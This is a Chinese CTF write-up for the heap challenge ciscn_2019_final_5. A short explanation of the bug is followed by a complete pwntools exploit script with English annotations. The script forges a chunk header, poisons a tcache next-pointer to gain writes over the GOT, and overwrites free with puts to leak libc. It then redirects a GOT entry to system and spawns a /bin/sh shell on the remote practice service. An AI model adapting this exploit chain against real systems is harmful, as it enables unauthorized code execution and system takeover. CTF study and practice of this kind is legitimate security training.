ciscn_2019_final_5

还是国赛时的题

最关键的点是,在new一个index为16的chunk时,返回的指针指向的其实是head+0x20的地方,所以可以通过在此处伪造一个head,然后free再申请,构造堆重叠。

然后修改tcache的fd,想怎么打怎么打。

exp:

#coding=UTF-8
from pwn import *
from LibcSearcher import *
#context.log_level='debug'
#sh=process("./ciscn_final_5.dms")
# Local copy of the challenge's libc; the symbol offsets read from it below
# (puts, system) must match the remote library exactly or the leak math is wrong.
libc=ELF("libc.so.6")
# Live connection to the practice service. Module-level side effect: the socket
# is opened as soon as this file is imported/run, before any helper is defined.
sh=remote("pwn.buuoj.cn",20234)
def new(index, size, content):
    """Drive the program's menu option 1 (``new``).

    Answers the ``index`` and ``size`` prompts as decimal strings and then sends
    ``content`` raw with ``send`` (no trailing newline), so the caller controls
    exactly which bytes land in the allocation.
    """
    sh.sendlineafter("choice: ", "1")
    sh.sendlineafter("index: ", str(int(index)))
    sh.sendlineafter("size: ", str(int(size)))
    sh.sendafter("content: ", content)
def delete(index):
    """Drive the program's menu option 2 (``delete``) for slot ``index``."""
    sh.sendlineafter("choice: ", "2")
    sh.sendlineafter("index: ", str(int(index)))
def edit(index, content):
    """Drive the program's menu option 3 (``edit``).

    Selects slot ``index`` and sends ``content`` raw (no trailing newline).
    """
    sh.sendlineafter("choice: ", "3")
    sh.sendlineafter("index: ", str(int(index)))
    sh.sendafter("content: ", content)

# Fixed addresses inside the challenge binary. The 0x4007xx / 0x6020xx values are
# only stable because the binary is not position-independent (PIE would
# randomise them), and the GOT entries are overwritten later in this script,
# which requires a writable GOT (i.e. not Full RELRO). Both protection states
# are inferred from what the exploit does, not visible on this page.
free_got=0x602018
puts_plt=0x400790
puts_got=0x602020
atoi_got=0x602078

# Per the write-up, the pointer handed back for index 16 lies 0x20 past the
# chunk head, so this write plants a fake chunk header (prev_size 0, size 0x90).
new(16,0x10,p64(0)+p64(0x90))
new(1,0xc0,'1')
# Free both. Presumably slot 0 aliases the forged 0x90 chunk so it enters the
# tcache through the fake header (cannot be confirmed from this page alone).
delete(0)
delete(1)
# Re-allocating from the forged chunk overlaps the freed 0xd0 chunk; the third
# qword (0x6020E0, writable data in the binary near the GOT addresses above) is
# what the write-up calls "modifying the tcache fd": a next-pointer this glibc
# version follows without validation. Safe-linking (glibc >= 2.32) mangles that
# pointer so a plain address no longer works -- the upstream mitigation here.
new(2,0x80,p64(0)+p64(0x21)+p64(0x6020E0))
new(3,0xc0,'3')
# The poisoned tcache entry hands back 0x6020E0 as if it were a chunk. The GOT
# addresses and the eight 0x10 values written here presumably overwrite the
# program's own slot table (hence "get ptr"); the exact layout is not visible.
new(4,0xc0,p64(free_got)+p64(puts_got+1)+p64(atoi_got-4)+p64(0)*17+p32(0x10)*8)#get ptr
# Assumes slot 8 now points at free_got: writing puts@plt there makes the next
# delete() print its argument instead of freeing it -- TODO confirm against the
# binary's table layout.
edit(8,p64(puts_plt)*2)
delete(1)
# The first 6 bytes of output are taken as a libc pointer. NOTE(review): the
# str concatenation only works under Python 2 pwntools; on Python 3 recv()
# returns bytes and this line raises TypeError.
leak=u64(sh.recv(6)+'\x00\x00')
libcbase=leak-libc.symbols['puts']
log.success("libcbase: "+hex(libcbase))
# Overwrites the GOT entry slot 4 points at with system(); sending "/bin/sh" as
# the menu choice is consistent with atoi@got being that entry (inferred).
edit(4,p64(libcbase+libc.symbols['system'])*2)
sh.recvuntil("choice: ")
sh.sendline("/bin/sh\x00")
sh.interactive()